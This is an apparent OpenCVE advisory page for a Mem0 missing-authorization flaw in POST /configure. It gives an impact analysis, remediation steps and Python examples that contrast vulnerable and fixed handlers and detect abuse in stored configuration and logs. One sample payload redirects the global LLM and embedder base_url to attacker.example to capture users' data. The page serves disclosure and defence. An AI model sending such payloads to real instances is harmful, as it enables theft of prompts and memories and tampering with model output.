Description
Mem0 versions through 0.2.8, fixed in commit ae7f406, contain a missing authorization vulnerability in the self-hosted server component where the POST /configure endpoint modifies global LLM provider and embedder configuration but only verifies authentication via JWT or X-API-Key without validating the caller's role. Any authenticated user holding a distributed API key can redirect all LLM and embedder traffic to an attacker-controlled server, with the malicious configuration persisted to PostgreSQL and surviving server restarts to affect all users and API keys on the instance.
Published: 2026-06-09
Score: 8.6 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Mem0 versions up to and including 0.2.8 accept POST /configure from any caller who presents a valid JWT or distributed X-API-Key: the server authenticates the caller but never checks the caller's role before applying the change. The endpoint rewrites the global LLM provider and embedder settings and persists the new values in PostgreSQL, so a single malicious request survives server restarts and applies to every user and API key on the instance. An attacker can therefore point all LLM and embedder traffic at a server they control, which hands them every prompt, stored memory and embedding input the instance sends out (confidentiality) and lets them return attacker-chosen completions and vectors to every user (integrity). This matches the CVSS vectors recorded on this page: C:H and I:H with no availability impact.
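The pattern the advisory describes, as an added illustration written for this page rather than Mem0's own code: a handler that authenticates the X-API-Key but performs no authorization, beside the same handler with the missing role check in place. The key table, the ConfigStore stand-in for the PostgreSQL-backed configuration, the handler names and the attacker host are all constructed assumptions.

```python
"""Illustrative model of the CWE-862 pattern described for POST /configure.

Added example for this page, not Mem0's code: API_KEYS, ConfigStore and the
configure_* handlers are constructed stand-ins.
"""
from dataclasses import dataclass, field
from typing import Optional

# Constructed key table standing in for distributed API keys / JWT subjects.
# Only one holder is an administrator.
API_KEYS = {
    "key-admin-0001": {"subject": "admin", "role": "admin"},
    "key-user-0042": {"subject": "alice", "role": "user"},
}

DEFAULT_ENDPOINT = "https://api.openai.com/v1"


@dataclass
class ConfigStore:
    """Stand-in for the persisted (PostgreSQL-backed) global configuration."""
    llm: dict = field(default_factory=lambda: {"provider": "openai", "base_url": DEFAULT_ENDPOINT})
    embedder: dict = field(default_factory=lambda: {"provider": "openai", "base_url": DEFAULT_ENDPOINT})


def authenticate(headers: dict) -> Optional[dict]:
    """Authentication only: maps X-API-Key to a principal, or None if unknown."""
    return API_KEYS.get(headers.get("X-API-Key", ""))


def apply_config(body: dict, store: ConfigStore) -> None:
    """Merge the request body into the global LLM and embedder settings."""
    store.llm = {**store.llm, **body.get("llm", {})}
    store.embedder = {**store.embedder, **body.get("embedder", {})}


def configure_vulnerable(headers: dict, body: dict, store: ConfigStore) -> tuple:
    """The pattern the advisory describes: any authenticated caller may rewrite global config."""
    principal = authenticate(headers)
    if principal is None:
        return 401, "unauthenticated"
    apply_config(body, store)          # no role check before a global, persisted change
    return 200, "configuration updated"


def configure_fixed(headers: dict, body: dict, store: ConfigStore) -> tuple:
    """Same handler with the authorization step that was missing."""
    principal = authenticate(headers)
    if principal is None:
        return 401, "unauthenticated"
    if principal["role"] != "admin":
        # 403, not 401: the caller is known, just not allowed. Worth logging.
        return 403, f"{principal['subject']} lacks role admin for POST /configure"
    apply_config(body, store)
    return 200, "configuration updated"


def demo() -> dict:
    """Run both handlers with an ordinary user's key and a hijacking payload."""
    hijack = {  # constructed attacker payload; attacker.example is a reserved test domain
        "llm": {"provider": "openai", "base_url": "https://attacker.example/v1"},
        "embedder": {"provider": "openai", "base_url": "https://attacker.example/v1"},
    }
    user_headers = {"X-API-Key": "key-user-0042"}
    vuln_store, fixed_store = ConfigStore(), ConfigStore()
    v_status, _ = configure_vulnerable(user_headers, hijack, vuln_store)
    f_status, _ = configure_fixed(user_headers, hijack, fixed_store)
    return {
        "vulnerable_status": v_status,
        "vulnerable_llm_base_url": vuln_store.llm["base_url"],
        "fixed_status": f_status,
        "fixed_llm_base_url": fixed_store.llm["base_url"],
    }


if __name__ == "__main__":
    print(demo())
```

The point of the comparison is the position of the check: authentication establishes who is calling, but a write to instance-wide, persisted state also needs an explicit decision that this principal is allowed to make it. Returning 403 rather than 401 to known-but-unprivileged callers also gives the audit log a clean signal for attempted abuse.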

Affected Systems

The affected product is mem0 by mem0ai, specifically its self‑hosted server component. All releases up to and including 0.2.8 carry the flaw; the fix is identified as commit ae7f406. The missing check is in the server handler for POST /configure. Client code and the web interface are not themselves described as vulnerable, but every client of a compromised instance is affected once the global LLM and embedder configuration has been changed.

Risk and Exploitability

The CVSS v4.0 base score is 8.6 (High); the v3.1 vector recorded on this page scores 8.1. Both vectors record network access, low attack complexity, low privileges required (PR:L) and no user interaction: the only barrier is possession of any valid API key or JWT for the instance. In a multi‑user deployment that makes every ordinary user a potential attacker, and a leaked or shared key extends the pool to outsiders. No EPSS score is available and the CVE is not in the CISA KEV catalog, so no in‑the‑wild exploitation had been recorded at publication time. The impact, however, is a persistent change to the instance's global configuration that survives restarts and affects all users, enabling ongoing exfiltration of prompts and memories or injection of attacker‑controlled model output until an administrator notices and reverts it.

Generated by OpenCVE AI on June 9, 2026 at 16:50 UTC.

Remediation

The CVE description identifies commit ae7f406 as the fix. No separate vendor advisory or documented workaround is listed on this page.

OpenCVE Recommended Actions

  • Update mem0 to a release that includes commit ae7f406, i.e. any release newer than 0.2.8
  • If an immediate upgrade is not possible, restrict POST /configure outside the application, for example by denying the route at the reverse proxy or allowing it only from administrator source addresses; the vulnerable server itself performs no role check on this endpoint, so an in‑app RBAC setting cannot be relied on to block it
  • After patching or restricting the endpoint, inspect the persisted LLM and embedder configuration and revert any unexpected provider or endpoint; the patch stops new modifications but does not undo one already stored in PostgreSQL
  • Revoke all existing distributed API keys and issue new ones, since any key that was in circulation while the instance was exposed could have been used
  • Monitor the PostgreSQL configuration tables for unexpected changes and enable audit logging on the /configure endpoint, including the calling principal
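The two monitoring items above turned into runnable checks, as an added example for this page rather than Mem0 tooling: a schema‑agnostic scan of persisted configuration rows for LLM or embedder endpoints outside an expected host allowlist, and a pass over access‑log lines that flags successful POST /configure calls by non‑admin principals. The row layout, the key=value log format (including a role field), the sample rows and log lines, and the allowlist are all constructed assumptions; adapt the parsing to whatever your reverse proxy or server actually records.

```python
"""Added detection example for CVE-2026-49948 (not Mem0 tooling).

Audits (1) a snapshot of persisted LLM/embedder configuration rows and
(2) access-log lines for the abuse the advisory describes. The row layout,
log format and allowlist below are constructed assumptions.
"""
import json
from urllib.parse import urlparse

# Egress hosts the operator expects model traffic to reach (assumption).
ALLOWED_HOSTS = {"api.openai.com", "llm.internal"}

# Constructed snapshot of configuration rows after a hijack of the LLM entry.
# The JSON layout is hypothetical; the scan below does not depend on it.
CONFIG_ROWS = [
    {"key": "llm", "value": json.dumps({
        "provider": "openai",
        "config": {"model": "gpt-4o-mini", "base_url": "https://attacker.example/v1"}})},
    {"key": "embedder", "value": json.dumps({
        "provider": "openai",
        "config": {"model": "text-embedding-3-small", "base_url": "https://api.openai.com/v1"}})},
]

# Constructed access-log lines in an assumed key=value format. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges; the principals are made up.
LOG_LINES = [
    "2026-06-09T12:00:01Z ip=203.0.113.7 subject=alice role=user method=POST path=/configure status=200",
    "2026-06-09T12:00:05Z ip=198.51.100.2 subject=admin role=admin method=POST path=/configure status=200",
    "2026-06-09T12:01:00Z ip=203.0.113.7 subject=alice role=user method=POST path=/memories status=200",
    "2026-06-09T12:02:00Z ip=203.0.113.9 subject=bob role=user method=POST path=/configure status=403",
]


def iter_strings(obj):
    """Yield every string inside a nested JSON value, whatever the schema."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for v in obj.values():
            yield from iter_strings(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from iter_strings(v)


def unexpected_hosts(rows, allowed=ALLOWED_HOSTS):
    """Return (row key, host) for every http(s) URL whose host is off the allowlist."""
    findings = []
    for row in rows:
        for s in iter_strings(json.loads(row["value"])):
            u = urlparse(s)
            if u.scheme in ("http", "https") and u.hostname and u.hostname not in allowed:
                findings.append((row["key"], u.hostname))
    return findings


def parse_kv_line(line):
    """Parse 'TIMESTAMP k=v k=v ...' into a dict (assumed log format)."""
    ts, *fields = line.split()
    rec = {"ts": ts}
    for f in fields:
        k, _, v = f.partition("=")
        rec[k] = v
    return rec


def suspicious_configure_calls(lines):
    """Flag successful POST /configure calls not made by an admin principal."""
    hits = []
    for line in lines:
        rec = parse_kv_line(line)
        if (rec.get("method") == "POST" and rec.get("path") == "/configure"
                and rec.get("status") == "200" and rec.get("role") != "admin"):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for key, host in unexpected_hosts(CONFIG_ROWS):
        print(f"ALERT config row {key!r} points at unexpected host {host}")
    for rec in suspicious_configure_calls(LOG_LINES):
        print(f"ALERT {rec['ts']} {rec['subject']} (role={rec['role']}) "
              f"changed global config from {rec['ip']}")
```

Walking every string in the row rather than reading a fixed field keeps the configuration check valid across schema changes and provider‑specific key names, and an allowlist of hosts is a smaller thing to maintain than a denylist of attacker endpoints. On a patched server the second check should never fire for a 200 response; if it does, the role check is not in the request path you think it is.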

Advisories

No advisories yet.

History

Tue, 09 Jun 2026 17:15:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Mem0ai
                                      Mem0ai mem0
Vendors & Products                    Mem0ai
                                      Mem0ai mem0

Tue, 09 Jun 2026 15:30:00 +0000

Type          Values Removed   Values Added
Description                    (the description text shown at the top of this page)
Title                          Mem0 0.2.8 Missing Authorization via POST /configure Endpoint
Weaknesses                     CWE-862
References
Metrics                        cvssV3_1: score 8.1, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
                               cvssV4_0: score 8.6, vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-09T15:34:54.594Z

Reserved: 2026-06-02T16:30:15.232Z

Link: CVE-2026-49948

Vulnrichment

No data.

NVD

Status : Deferred

Published: 2026-06-09T16:16:43.450

Modified: 2026-06-09T19:36:10.547

Link: CVE-2026-49948

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-09T17:00:09Z

Weaknesses